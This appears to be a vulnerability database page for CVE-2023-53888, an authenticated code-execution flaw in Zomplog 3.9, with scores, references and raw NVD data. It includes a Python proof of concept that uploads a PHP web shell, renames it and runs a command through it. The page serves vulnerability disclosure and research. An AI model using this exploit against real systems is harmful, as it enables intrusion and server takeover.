CVE-2023-53888

Description

Zomplog 3.9 contains a remote code execution vulnerability that allows authenticated attackers to inject and execute arbitrary PHP code through file manipulation endpoints. Attackers can upload malicious JavaScript files, rename them to PHP, and execute system commands by exploiting the saveE and rename actions in the application.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zomp:zomplog:3.9:*:*:*:*:*:*:* - VULNERABLE

Zomplog 3.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# 目标URL
target_url = 'http://target.com/zomplog'

# 登录获取认证
login_url = f'{target_url}/login.php'
credentials = {'username': 'attacker', 'password': 'password'}
session = requests.Session()
session.post(login_url, data=credentials)

# 上传恶意文件
upload_url = f'{target_url}/admin/saveE.php'
malicious_code = '<?php system($_GET["cmd"]); ?>'
files = {'file': ('malicious.js', malicious_code)}
session.post(upload_url, files=files)

# 重命名为PHP
rename_url = f'{target_url}/admin/rename.php'
rename_data = {'old_name': 'malicious.js', 'new_name': 'malicious.php'}
session.post(rename_url, data=rename_data)

# 执行命令
cmd_url = f'{target_url}/uploads/malicious.php'
response = session.get(cmd_url, params={'cmd': 'whoami'})
print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53888
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53888
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53888/
[4] VulDB https://vuldb.com/cve/CVE-2023-53888
[5] https://web.archive.org/web/20080616153330/http://zomp.nl/zomplog/
[6] https://www.exploit-db.com/exploits/51624
[7] https://www.vulncheck.com/advisories/zomplog-remote-code-execution-via-authenticated-file-manipulation
[8] https://www.exploit-db.com/exploits/51624

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53888", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.973", "lastModified": "2025-12-24T18:11:46.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zomplog 3.9 contains a remote code execution vulnerability that allows authenticated attackers to inject and execute arbitrary PHP code through file manipulation endpoints. Attackers can upload malicious JavaScript files, rename them to PHP, and execute system commands by exploiting the saveE and rename actions in the application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zomp:zomplog:3.9:*:*:*:*:*:*:*", "matchCriteriaId": "949016D9-244B-4068-92AC-20FF69759408"}]}]}], "references": [{"url": "https://web.archive.org/web/20080616153330/http://zomp.nl/zomplog/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51624", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/zomplog-remote-code-execution-via-authenticated-file-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51624", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}